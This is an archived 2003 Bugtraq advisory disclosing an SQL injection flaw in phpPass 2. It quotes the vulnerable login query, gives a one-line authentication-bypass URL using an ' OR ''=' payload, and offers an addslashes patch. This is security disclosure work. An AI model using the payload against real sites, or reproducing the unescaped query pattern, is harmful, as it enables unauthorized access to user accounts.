[28475] in bugtraq
phpPass (PHP)
daemon@ATHENA.MIT.EDU (Frog Man)
Mon Jan 20 07:20:58 2003
From: "Frog Man" <leseulfrog@hotmail.com>
To: bugtraq@securityfocus.com
Date: Mon, 13 Jan 2003 11:34:27 +0100
Mime-Version: 1.0
Content-Type: text/plain; charset=iso-8859-1; format=flowed
Message-ID: <F4XPhkddUXtQ1M5yfu20001f509@hotmail.com>
Informations :
°°°°°°°°°°°°°°
Version : 2
Website : http://www.agames-net.com
Problem : SQL Injection
PHP Code/Location :
°°°°°°°°°°°°°°°°°°°
accesscontrol.php :
------------------------------------------------
[...]
session_register("uid");
session_register("pwd");
[...]
$sql = "SELECT * FROM user WHERE
userid = '$uid' AND password = '$pwd'";
$result = mysql_query($sql);
[...]
if (mysql_num_rows($result) == 0) {
session_unregister("uid");
session_unregister("pwd");
?>
<html>
<head>
<title> Access Denied </title>
[...]
exit;
[...]
------------------------------------------------
Exploit :
°°°°°°°°°
http://[target]/protectedpage.php?uid='%20OR%20''='&pwd='%20OR%20''='
Patch :
°°°°°°°
In accesscontrol.php, replace the lines :
-------------------------------------------------
$sql = "SELECT * FROM user WHERE
userid = '$uid' AND password = '$pwd'";
$result = mysql_query($sql);
------------------------------------------------
by :
------------------------------------------------------------------------
$uid=addslashes($uid);
$pwd=addslashes($pwd);
$sql = "SELECT * FROM user WHERE userid = '$uid' AND password = '$pwd'";
$result = mysql_query($sql);
------------------------------------------------------------------------
A patch can be found on http://www.phpsecure.org .
More details :
°°°°°°°°°°°°°°
In French :
http://www.frog-man.org/tutos/phpPass.txt
translated by Google :
http://translate.google.com/translate?u=http%3A%2F%2Fwww.frog-man.org%2Ftutos%2FphpPass.txt&langpair=fr%7Cen&hl=en&ie=ISO-8859-1&prev=%2Flanguage_tools
frog-m@n
_________________________________________________________________
MSN Messenger : discutez en direct avec vos amis !
http://www.msn.fr/msger/default.asp
